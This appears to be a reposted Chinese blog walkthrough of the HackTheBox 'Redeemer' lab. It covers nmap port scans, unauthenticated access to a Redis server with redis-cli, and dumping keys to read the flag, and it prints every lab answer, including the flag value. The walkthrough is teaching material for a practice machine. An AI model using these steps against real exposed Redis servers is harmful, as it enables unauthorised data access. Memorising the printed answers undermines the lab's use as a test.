HackTheBox-Redeemer:Redis未授权访问

2023-12-14 15:18:22

HackTheBox-Redeemer:Redis未授权访问

前面讲渗透流程,后面会集中回答问题。

连接 vpn 并开启靶机

连接 vpn :

openvpn starting_point_changeTheWay.ovpn

开启靶机,靶机 IP 为:10.129.77.111

nmap 扫描

端口扫描:
# 命令
nmap --min-rate 10000 -p- 10.129.77.111 -o nmapscan/port
# 输出
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-09 23:17 CST
Nmap scan report for 10.129.77.111
Host is up (0.31s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE
6379/tcp open  redis

可见只开放了 6379 一个端口。

全面扫描:
# 命令
nmap -sV -sT -O -p6379 10.129.77.111 -o nmapscan/details
# 输出
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-09 23:21 CST
Nmap scan report for 10.129.77.111
Host is up (0.30s latency).

PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Network Distance: 2 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.34 seconds

Redis 版本为 5.0.7 ,操作系统版本为 Linux 5.X 。

漏洞脚本扫描:
# 命令
nmap --script=vuln -p6379 10.129.77.111 -o nmapscan/vuln
# 输出
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-09 23:23 CST
Nmap scan report for 10.129.77.111
Host is up (0.29s latency).

PORT     STATE SERVICE
6379/tcp open  redis

Nmap done: 1 IP address (1 host up) scanned in 28.68 seconds

并未发现更多信息。

UDP 扫描:
# 命令
nmap -sU -p6379 10.129.77.111 -o nmapscan/udp
# 输出
arting Nmap 7.93 ( https://nmap.org ) at 2023-12-09 23:24 CST
Nmap scan report for 10.129.77.111
Host is up (0.31s latency).

PORT     STATE  SERVICE
6379/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds

没有开放的 UDP 端口。

Redis 未授权访问

关于 Redis

redis 是一个开源的使用 ANSI C 语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value 数据库,并提供多种语言的 API 。和 Memcached 类似。redis 支持存储的 value 类型相对更多,包括 string (字符串)、list (链表)、set (集合)和 zset (有序集合)。

因此,redis 是一个内存数据库。

redis-cli 命令
关于 redis-cli

redis-cli 是用来远程连接 redis 的工具。

redis-cli 的安装

kali 上使用以下命令即可安装:

apt install redis-tools
redis-cli 的使用
redis-cli -h host -p port [-a password]

在这里是:

redis-cli -h 10.129.77.111 -p 6379

由于存在未授权访问,故不需要 -a 字段。-a 为可选字段。

此时弹出的命令提示符为:

10.129.77.111:6379>

表明已经获得 redis 数据库权限。

redis 命令行
info 命令获取 Redis 服务器的信息和统计信息
# 输入
info
# 输出
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
redis_mode:standalone
os:Linux 5.4.0-77-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.3.0
process_id:753
run_id:142b8d1c4c1c887bd769ce828eaed3036028ab70
tcp_port:6379
uptime_in_seconds:2733
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:7638905
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0

# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:5828608
used_memory_rss_human:5.56M
used_memory_peak:859624
used_memory_peak_human:839.48K
used_memory_peak_perc:100.00%
used_memory_overhead:846142
used_memory_startup:796224
used_memory_dataset:13482
used_memory_dataset_perc:21.26%
allocator_allocated:1564792
allocator_active:1937408
allocator_resident:9158656
total_system_memory:2084024320
total_system_memory_human:1.94G
used_memory_lua:41984
used_memory_lua_human:41.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.24
allocator_frag_bytes:372616
allocator_rss_ratio:4.73
allocator_rss_bytes:7221248
rss_overhead_ratio:0.64
rss_overhead_bytes:-3330048
mem_fragmentation_ratio:7.13
mem_fragmentation_bytes:5010992
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1702135889
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:413696
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:9
total_commands_processed:7
instantaneous_ops_per_sec:0
total_net_input_bytes:518
total_net_output_bytes:14861
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:479
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:eca06822bbaca983857ec952daebe25cdd238745
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:2.349627
used_cpu_user:2.633147
used_cpu_sys_children:0.001884
used_cpu_user_children:0.000000

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=4,expires=0,avg_ttl=0
select 在 Redis 中选择所需的数据库
# 语法
select index

数据库索引号 index 用数字值指定,以 0 作为起始索引值。

如选择索引值为 0 的数据库:

select 0
查看当前数据库中所有的 key

前面说了,redis 数据库是 Key-Value 型数据库,所以里面的数据存储形式都是键值对的形式。

# 输入
keys *
# 输出
1) "numb"
2) "flag"
3) "temp"
4) "stor"
查看 key 所对应的 value
# 命令
get key_name
# 输入
get flag
# 输出
"03e1d2b376c37ab3f5319922053953eb"

问题的答案

Which TCP port is open on the machine?

6379

Which service is running on the port that is open on the machine?

redis

What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database

In-memory Database(内存型数据库)

Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.

redis-cli

Which flag is used with the Redis command-line utility to specify the hostname?

-h

Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?

info

What is the version of the Redis server being used on the target machine?

5.0.7

Which command is used to select the desired database in Redis?

select

How many keys are present inside the database with index 0?

4

Which command is used to obtain all the keys in a database?

keys *

Submit root flag

03e1d2b376c37ab3f5319922053953eb

总结与思考

本台靶机考查 redis 未授权访问,但是并未涉及到更进一步的提权拿 shell ,关于此漏洞的提权利用可以去看一篇博客:

https://www.cnblogs.com/ly-lyy/articles/17305843.html#%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8B

里面提到的三种利用该漏洞的提权方式值得大家学习。

文章来源:https://blog.csdn.net/m0_73612768/article/details/134903460
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。